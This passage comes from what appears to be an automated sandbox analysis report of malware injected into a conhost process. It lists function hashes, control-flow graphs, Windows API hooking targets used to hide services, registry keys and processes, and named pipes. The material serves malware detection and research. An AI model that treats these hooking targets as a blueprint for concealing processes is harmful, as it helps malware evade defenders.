                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: fdec7c5ebad63a9ceb2894539f6207f6aabeaf2232fef269ed000564abef1073
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: D471D73A211E1087EB629F66ED916DA33A4FB8EBC8F401115DE8E97B69DF38C454C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB9812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 950d76e7447ce618bbd3946aa32bf56122d3107040713e302d5c441cec49daa6
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F4511C3A604F8487EB65CF62EA4439B77A1F78DBD9F448129DA8A87768DF38C055C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB981D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 35038298815813c5cad0125bcd6ff06df4736fe1e42454840a99eebc41dad74b
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: B231937C100E4AA3EAA7EF69EF916E67320FB0E784F905027D85992575AF38864DC350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB956910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 205 1b0bb956910-1b0bb956916 206 1b0bb956951-1b0bb95695b 205->206 207 1b0bb956918-1b0bb95691b 205->207 208 1b0bb956a78-1b0bb956a8d 206->208 209 1b0bb956945-1b0bb956984 call 1b0bb956fc0 207->209 210 1b0bb95691d-1b0bb956920 207->210 213 1b0bb956a9c-1b0bb956ab6 call 1b0bb956e54 208->213 214 1b0bb956a8f 208->214 228 1b0bb956a52 209->228 229 1b0bb95698a-1b0bb95699f call 1b0bb956e54 209->229 211 1b0bb956922-1b0bb956925 210->211 212 1b0bb956938 __scrt_dllmain_crt_thread_attach 210->212 216 1b0bb956927-1b0bb956930 211->216 217 1b0bb956931-1b0bb956936 call 1b0bb956f04 211->217 220 1b0bb95693d-1b0bb956944 212->220 226 1b0bb956aef-1b0bb956b20 call 1b0bb957190 213->226 227 1b0bb956ab8-1b0bb956aed call 1b0bb956f7c call 1b0bb956e1c call 1b0bb957318 call 1b0bb957130 call 1b0bb957154 call 1b0bb956fac 213->227 218 1b0bb956a91-1b0bb956a9b 214->218 217->220 237 1b0bb956b31-1b0bb956b37 226->237 238 1b0bb956b22-1b0bb956b28 226->238 227->218 232 1b0bb956a54-1b0bb956a69 228->232 240 1b0bb9569a5-1b0bb9569b6 call 1b0bb956ec4 229->240 241 1b0bb956a6a-1b0bb956a77 call 1b0bb957190 229->241 244 1b0bb956b7e-1b0bb956b94 call 1b0bb95268c 237->244 245 1b0bb956b39-1b0bb956b43 237->245 238->237 243 1b0bb956b2a-1b0bb956b2c 238->243 255 1b0bb956a07-1b0bb956a11 call 1b0bb957130 240->255 256 1b0bb9569b8-1b0bb9569dc call 1b0bb9572dc call 1b0bb956e0c call 1b0bb956e38 call 1b0bb95ac0c 240->256 241->208 250 1b0bb956c1f-1b0bb956c2c 243->250 263 1b0bb956b96-1b0bb956b98 244->263 264 1b0bb956bcc-1b0bb956bce 244->264 251 1b0bb956b45-1b0bb956b4d 245->251 252 1b0bb956b4f-1b0bb956b5d call 1b0bb965780 245->252 258 1b0bb956b63-1b0bb956b78 call 1b0bb956910 251->258 252->258 274 1b0bb956c15-1b0bb956c1d 252->274 255->228 276 1b0bb956a13-1b0bb956a1f call 1b0bb957180 255->276 256->255 308 1b0bb9569de-1b0bb9569e5 __scrt_dllmain_after_initialize_c 256->308 258->244 258->274 263->264 271 1b0bb956b9a-1b0bb956bbc call 1b0bb95268c call 1b0bb956a78 263->271 272 1b0bb956bd5-1b0bb956bea call 1b0bb956910 264->272 273 1b0bb956bd0-1b0bb956bd3 264->273 271->264 302 1b0bb956bbe-1b0bb956bc6 call 1b0bb965780 271->302 272->274 287 1b0bb956bec-1b0bb956bf6 272->287 273->272 273->274 274->250 295 1b0bb956a45-1b0bb956a50 276->295 296 1b0bb956a21-1b0bb956a2b call 1b0bb957098 276->296 292 1b0bb956c01-1b0bb956c11 call 1b0bb965780 287->292 293 1b0bb956bf8-1b0bb956bff 287->293 292->274 293->274 295->232 296->295 307 1b0bb956a2d-1b0bb956a3b 296->307 302->264 307->295 308->255 309 1b0bb9569e7-1b0bb956a04 call 1b0bb95abc8 308->309 309->255
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4a4122ede09c1619a71ee8c9c04f52e233d8f57fac6d92093c39ae32007e623b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 7681CE397A0F418BFB77AB66D6413DB36E0EBAD780F5480259A49C3796DF38C9458700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001B0BB98CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CEBC
                                                        • SetLastError.KERNEL32 ref: 000001B0BB98CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001B0BB98ECCC,?,?,?,?,000001B0BB98BF9F,?,?,?,?,?,000001B0BB987AB0), ref: 000001B0BB98CF2C
                                                          • Part of subcall function 000001B0BB98D6CC: HeapAlloc.KERNEL32 ref: 000001B0BB98D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF54
                                                          • Part of subcall function 000001B0BB98D744: HeapFree.KERNEL32 ref: 000001B0BB98D75A
                                                          • Part of subcall function 000001B0BB98D744: GetLastError.KERNEL32 ref: 000001B0BB98D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001B0BB990A6B,?,?,?,000001B0BB99045C,?,?,?,000001B0BB98C84F), ref: 000001B0BB98CF76
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: a04337f93daf67d82fd3d6e5c187dfe476c05442b224a94c0da0768cd3122dcb
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: CF412E3D201E5843FA7B67255F553EB3152DF8F7F0F241B24A936D66E6DFA898118200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB982244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 01d9ec633aa4feef1a423ecb07b739f5a2d8ee8ca4f16215dbf00cc8c85c1c92
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 2E21413A614F4083F7618B25F65439A77A0F78EBE4F504219EA9943BA8DF3CC149CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 584 1b0bb98a544-1b0bb98a5ac call 1b0bb98b414 587 1b0bb98a5b2-1b0bb98a5b5 584->587 588 1b0bb98aa13-1b0bb98aa1b call 1b0bb98c748 584->588 587->588 589 1b0bb98a5bb-1b0bb98a5c1 587->589 591 1b0bb98a690-1b0bb98a6a2 589->591 592 1b0bb98a5c7-1b0bb98a5cb 589->592 594 1b0bb98a6a8-1b0bb98a6ac 591->594 595 1b0bb98a963-1b0bb98a967 591->595 592->591 596 1b0bb98a5d1-1b0bb98a5dc 592->596 594->595 597 1b0bb98a6b2-1b0bb98a6bd 594->597 599 1b0bb98a969-1b0bb98a970 595->599 600 1b0bb98a9a0-1b0bb98a9aa call 1b0bb989634 595->600 596->591 598 1b0bb98a5e2-1b0bb98a5e7 596->598 597->595 601 1b0bb98a6c3-1b0bb98a6ca 597->601 598->591 602 1b0bb98a5ed-1b0bb98a5f7 call 1b0bb989634 598->602 599->588 603 1b0bb98a976-1b0bb98a99b call 1b0bb98aa1c 599->603 600->588 610 1b0bb98a9ac-1b0bb98a9cb call 1b0bb987940 600->610 605 1b0bb98a6d0-1b0bb98a707 call 1b0bb989a10 601->605 606 1b0bb98a894-1b0bb98a8a0 601->606 602->610 618 1b0bb98a5fd-1b0bb98a628 call 1b0bb989634 * 2 call 1b0bb989d24 602->618 603->600 605->606 622 1b0bb98a70d-1b0bb98a715 605->622 606->600 611 1b0bb98a8a6-1b0bb98a8aa 606->611 615 1b0bb98a8ba-1b0bb98a8c2 611->615 616 1b0bb98a8ac-1b0bb98a8b8 call 1b0bb989ce4 611->616 615->600 621 1b0bb98a8c8-1b0bb98a8d5 call 1b0bb9898b4 615->621 616->615 628 1b0bb98a8db-1b0bb98a8e3 616->628 650 1b0bb98a648-1b0bb98a652 call 1b0bb989634 618->650 651 1b0bb98a62a-1b0bb98a62e 618->651 621->600 621->628 626 1b0bb98a719-1b0bb98a74b 622->626 630 1b0bb98a751-1b0bb98a75c 626->630 631 1b0bb98a887-1b0bb98a88e 626->631 633 1b0bb98a8e9-1b0bb98a8ed 628->633 634 1b0bb98a9f6-1b0bb98aa12 call 1b0bb989634 * 2 call 1b0bb98c6a8 628->634 630->631 635 1b0bb98a762-1b0bb98a77b 630->635 631->606 631->626 637 1b0bb98a8ef-1b0bb98a8fe call 1b0bb989ce4 633->637 638 1b0bb98a900 633->638 634->588 639 1b0bb98a781-1b0bb98a7c6 call 1b0bb989cf8 * 2 635->639 640 1b0bb98a874-1b0bb98a879 635->640 643 1b0bb98a903-1b0bb98a90d call 1b0bb98b4ac 637->643 638->643 665 1b0bb98a7c8-1b0bb98a7ee call 1b0bb989cf8 call 1b0bb98ac38 639->665 666 1b0bb98a804-1b0bb98a80a 639->666 646 1b0bb98a884 640->646 643->600 663 1b0bb98a913-1b0bb98a961 call 1b0bb989944 call 1b0bb989b50 643->663 646->631 650->591 669 1b0bb98a654-1b0bb98a674 call 1b0bb989634 * 2 call 1b0bb98b4ac 650->669 651->650 657 1b0bb98a630-1b0bb98a63b 651->657 657->650 662 1b0bb98a63d-1b0bb98a642 657->662 662->588 662->650 663->600 684 1b0bb98a7f0-1b0bb98a802 665->684 685 1b0bb98a815-1b0bb98a872 call 1b0bb98a470 665->685 673 1b0bb98a87b 666->673 674 1b0bb98a80c-1b0bb98a810 666->674 690 1b0bb98a68b 669->690 691 1b0bb98a676-1b0bb98a680 call 1b0bb98b59c 669->691 678 1b0bb98a880 673->678 674->639 678->646 684->665 684->666 685->678 690->591 694 1b0bb98a9f0-1b0bb98a9f5 call 1b0bb98c6a8 691->694 695 1b0bb98a686-1b0bb98a9ef call 1b0bb9892ac call 1b0bb98aff4 call 1b0bb9894a0 691->695 694->634 695->694
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: a4ad48564dfeffe3e1c13022fc98f4b1e646bbad5f6f294724efccc416cc11b6
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 98E18D7A604B408BEB369F65DA803DE77A0F75A7D8F101215EE8997B9ACF38D081C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB959944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 463 1b0bb959944-1b0bb9599ac call 1b0bb95a814 466 1b0bb959e13-1b0bb959e1b call 1b0bb95bb48 463->466 467 1b0bb9599b2-1b0bb9599b5 463->467 467->466 468 1b0bb9599bb-1b0bb9599c1 467->468 470 1b0bb9599c7-1b0bb9599cb 468->470 471 1b0bb959a90-1b0bb959aa2 468->471 470->471 475 1b0bb9599d1-1b0bb9599dc 470->475 473 1b0bb959d63-1b0bb959d67 471->473 474 1b0bb959aa8-1b0bb959aac 471->474 478 1b0bb959da0-1b0bb959daa call 1b0bb958a34 473->478 479 1b0bb959d69-1b0bb959d70 473->479 474->473 476 1b0bb959ab2-1b0bb959abd 474->476 475->471 477 1b0bb9599e2-1b0bb9599e7 475->477 476->473 480 1b0bb959ac3-1b0bb959aca 476->480 477->471 481 1b0bb9599ed-1b0bb9599f7 call 1b0bb958a34 477->481 478->466 489 1b0bb959dac-1b0bb959dcb call 1b0bb956d40 478->489 479->466 482 1b0bb959d76-1b0bb959d9b call 1b0bb959e1c 479->482 485 1b0bb959c94-1b0bb959ca0 480->485 486 1b0bb959ad0-1b0bb959b07 call 1b0bb958e10 480->486 481->489 497 1b0bb9599fd-1b0bb959a28 call 1b0bb958a34 * 2 call 1b0bb959124 481->497 482->478 485->478 490 1b0bb959ca6-1b0bb959caa 485->490 486->485 501 1b0bb959b0d-1b0bb959b15 486->501 494 1b0bb959cac-1b0bb959cb8 call 1b0bb9590e4 490->494 495 1b0bb959cba-1b0bb959cc2 490->495 494->495 507 1b0bb959cdb-1b0bb959ce3 494->507 495->478 500 1b0bb959cc8-1b0bb959cd5 call 1b0bb958cb4 495->500 531 1b0bb959a48-1b0bb959a52 call 1b0bb958a34 497->531 532 1b0bb959a2a-1b0bb959a2e 497->532 500->478 500->507 505 1b0bb959b19-1b0bb959b4b 501->505 509 1b0bb959c87-1b0bb959c8e 505->509 510 1b0bb959b51-1b0bb959b5c 505->510 512 1b0bb959df6-1b0bb959e12 call 1b0bb958a34 * 2 call 1b0bb95baa8 507->512 513 1b0bb959ce9-1b0bb959ced 507->513 509->485 509->505 510->509 514 1b0bb959b62-1b0bb959b7b 510->514 512->466 516 1b0bb959d00 513->516 517 1b0bb959cef-1b0bb959cfe call 1b0bb9590e4 513->517 518 1b0bb959c74-1b0bb959c79 514->518 519 1b0bb959b81-1b0bb959bc6 call 1b0bb9590f8 * 2 514->519 524 1b0bb959d03-1b0bb959d0d call 1b0bb95a8ac 516->524 517->524 526 1b0bb959c84 518->526 544 1b0bb959c04-1b0bb959c0a 519->544 545 1b0bb959bc8-1b0bb959bee call 1b0bb9590f8 call 1b0bb95a038 519->545 524->478 542 1b0bb959d13-1b0bb959d61 call 1b0bb958d44 call 1b0bb958f50 524->542 526->509 531->471 548 1b0bb959a54-1b0bb959a74 call 1b0bb958a34 * 2 call 1b0bb95a8ac 531->548 532->531 536 1b0bb959a30-1b0bb959a3b 532->536 536->531 541 1b0bb959a3d-1b0bb959a42 536->541 541->466 541->531 542->478 552 1b0bb959c0c-1b0bb959c10 544->552 553 1b0bb959c7b 544->553 563 1b0bb959c15-1b0bb959c72 call 1b0bb959870 545->563 564 1b0bb959bf0-1b0bb959c02 545->564 569 1b0bb959a76-1b0bb959a80 call 1b0bb95a99c 548->569 570 1b0bb959a8b 548->570 552->519 554 1b0bb959c80 553->554 554->526 563->554 564->544 564->545 573 1b0bb959a86-1b0bb959def call 1b0bb9586ac call 1b0bb95a3f4 call 1b0bb9588a0 569->573 574 1b0bb959df0-1b0bb959df5 call 1b0bb95baa8 569->574 570->471 573->574 574->512
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 17b000218209b708ad949f5d8bb673a37b220f21f4be850ce80d16114b09203a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: B1E17A7A644B808BFB729F65D6803DE7BA4F769B98F100116EE8997B99CF34C491C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 89ecab826a941491b751d100c92843fde61a6a7982743ceed0bbd23e688cdd68
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 4641AC3A311E1083FA778B26AE487D77291FB4EBE0F59592A9D1EC7784EF38C4458210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 735 1b0bb98104c-1b0bb9810b9 RegQueryInfoKeyW 736 1b0bb9810bf-1b0bb9810c9 735->736 737 1b0bb9811b5-1b0bb9811d0 735->737 736->737 738 1b0bb9810cf-1b0bb98111f RegEnumValueW 736->738 739 1b0bb9811a5-1b0bb9811af 738->739 740 1b0bb981125-1b0bb98112a 738->740 739->737 739->738 740->739 741 1b0bb98112c-1b0bb981135 740->741 742 1b0bb981147-1b0bb98114c 741->742 743 1b0bb981137 741->743 745 1b0bb981199-1b0bb9811a3 742->745 746 1b0bb98114e-1b0bb981193 GetProcessHeap call 1b0bb996168 GetProcessHeap HeapFree 742->746 744 1b0bb98113b-1b0bb98113f 743->744 744->739 747 1b0bb981141-1b0bb981145 744->747 745->739 746->745 747->742 747->744
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 85f090df381a6e4279f1f3d719b2c88b04006be06cca7ecdfcf592053c64582d
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 4A414E76214F84C7E7A1CF21E94479B77A1F38DB98F448129DA8A47B58DF38C585CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB98D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001B0BB98C7DE,?,?,?,?,?,?,?,?,000001B0BB98CF9D,?,?,00000001), ref: 000001B0BB98D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 3dba319d4711e62bc3511ca93b3d234f165490b7ea34506d427e135e2bd6a5b8
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 3A114F39604A5843FA7B67259F523FB7141DF8FBF0F1457289839D66EADF68C4028210
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB987510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: b3934b0978a5232d5d576f52f02f3683101d4e55fb511b034a5a54ef02d023d4
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 99817D39600E4187FBB3AB65AE813DB3691EB8FBC0F144419A949C77A6EF3CC8458711
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 000001B0BB989DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 513716fd9f522b5f06c6acce9ca5cf0e112c6c0d5aef5ab896f36eafcbb6a0dc
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 2431C439212E40D3EF739B02AE407E63A94F74EBE0F5915299D6E87792DF39C4558310
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

